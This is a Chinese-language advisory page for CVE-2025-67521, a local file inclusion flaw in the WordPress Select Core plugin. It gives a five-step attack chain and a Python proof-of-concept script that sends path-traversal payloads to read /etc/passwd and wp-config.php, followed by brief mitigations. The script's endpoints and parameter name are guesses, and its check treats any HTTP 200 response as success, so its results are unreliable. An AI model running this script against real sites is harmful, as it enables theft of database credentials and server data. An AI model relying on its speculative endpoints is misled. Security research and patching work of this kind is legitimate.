CVE-2025-67521 Select Core插件本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-67521

漏洞类型

本地文件包含

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Select-Themes Select Core (select-core)

漏洞概述

CVE-2025-67521是WordPress插件Select Core中的一个高危安全漏洞，CVSS评分达到7.5分。该漏洞属于PHP文件包含类漏洞，具体为"PHP Remote File Inclusion"类型，允许攻击者进行本地文件包含（LFI）操作。Select Core是WordPress主题和插件中常用的核心功能组件，被广泛应用于Select-Themes系列主题中。此漏洞影响Select Core从任意版本到2.6之前的所有版本，攻击者无需高权限即可利用该漏洞。成功利用此漏洞可能导致敏感文件泄露、服务器配置信息暴露，甚至在特定条件下可能实现远程代码执行（RCE），对网站安全造成严重威胁。

技术细节

该漏洞存在于Select Core插件的文件包含逻辑中，由于对用户输入的文件路径参数缺乏充分的验证和过滤，攻击者可以通过构造恶意请求来包含服务器上的任意本地文件。漏洞主要出现在插件处理include或require语句时，未正确限制可包含文件的范围和路径。攻击者通常利用该漏洞读取敏感文件如/etc/passwd、wp-config.php等配置文件，从而获取数据库凭证、API密钥等敏感信息。在某些配置环境下，如果服务器允许远程文件包含且php配置允许远程URL包含，攻击者甚至可能通过包含远程恶意脚本来执行任意代码。攻击者通常通过URL参数或POST请求参数传递恶意文件路径，利用路径遍历技术（如../）来访问上层目录的敏感文件。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标网站使用的WordPress版本及是否安装Select Core插件

STEP 2

步骤2

漏洞探测：访问Select Core插件的可利用端点，测试文件包含功能是否存在

STEP 3

步骤3

路径遍历构造：利用../等路径遍历字符构造恶意请求，尝试访问系统敏感文件

STEP 4

步骤4

敏感文件读取：成功利用漏洞读取wp-config.php等配置文件获取数据库凭证

STEP 5

步骤5

权限提升/远程代码执行：在获取足够信息后，通过写入恶意代码或利用其他漏洞实现RCE

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-67521 Local File Inclusion PoC
# Target: WordPress Select Core Plugin < 2.6
# Type: Local File Inclusion

import requests
import sys

def test_lfi(target_url, file_path='/etc/passwd'):
    """
    Test for Local File Inclusion vulnerability in Select Core plugin
    """
    # Common vulnerable endpoints in Select Core
    vulnerable_paths = [
        '/wp-content/plugins/select-core/includes/common/front-end-include.php',
        '/wp-content/plugins/select-core/shortcodes/load.php',
        '/wp-content/plugins/select-core/lib/common.php'
    ]
    
    # LFI payload - try to include sensitive files
    payload = file_path
    
    for path in vulnerable_paths:
        url = target_url.rstrip('/') + path
        params = {
            'file': payload  # Common parameter name
        }
        
        try:
            response = requests.get(url, params=params, timeout=10, verify=False)
            if 'root:' in response.text or response.status_code == 200:
                print(f'[+] Potential LFI found at: {url}')
                print(f'[+] File content preview:')
                print(response.text[:500])
                return True
        except requests.RequestException as e:
            print(f'[-] Error testing {url}: {e}')
    
    return False

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: python cve-2025-67521.py <target_url>')
        sys.exit(1)
    
    target = sys.argv[1]
    print(f'[*] Testing {target} for CVE-2025-67521')
    
    # Test with common sensitive files
    test_files = ['/etc/passwd', '../../../../wp-config.php', '/etc/hosts']
    
    for f in test_files:
        print(f'\n[*] Testing file: {f}')
        if test_lfi(target, f):
            break

影响范围

Select Core < 2.6

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1) 临时禁用Select Core插件或相关功能；2) 通过Web应用防火墙阻止包含file、path等参数的异常请求；3) 修改服务器配置禁用allow_url_fopen和allow_url_include；4) 限制网站目录的访问权限，确保wp-config.php等敏感文件不可被Web用户读取；5) 启用Web服务器的文件访问日志监控，及时发现异常访问行为。